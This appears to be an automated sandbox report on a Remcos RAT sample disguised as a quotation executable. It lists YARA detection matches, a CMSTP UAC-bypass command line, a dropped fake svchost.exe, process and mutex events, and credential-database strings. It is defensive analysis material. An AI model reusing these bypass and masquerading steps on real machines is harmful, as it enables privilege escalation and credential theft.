Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: String function: 00401E65 appears 34 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864

Source: QUOTATION#30810.exe	Static PE information: No import functions for PE file found
Source: svchost.exe.0.dr	Static PE information: No import functions for PE file found

Source: QUOTATION#30810.exe, 00000000.00000000.1537975574.000001FCF8318000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUnuvinipiH vs QUOTATION#30810.exe
Source: QUOTATION#30810.exe	Binary or memory string: OriginalFilenameUnuvinipiH vs QUOTATION#30810.exe

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf

Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: QUOTATION#30810.exe, ------.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: svchost.exe.0.dr, ------.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@77/31@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 32_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

32_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	26_2_00417952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 39_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,	39_2_00410DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	45_2_00417952

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 32_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

32_2_00418758

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

26_2_0040F474

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

26_2_0041B4A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

26_2_0041AA4A

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6908
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-R7QS5C
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2772
Source: C:\Windows\System32\cmstp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Connection Manager Profile Installer Mutex
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5864
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File created: C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""

Source: QUOTATION#30810.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION#30810.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System information queried: HandleInformation

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmstp.exe")

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: vbc.exe, vbc.exe, 00000025.00000002.1820823385.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: vbc.exe, vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: vbc.exe, 00000020.00000002.1860721293.00000000070C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
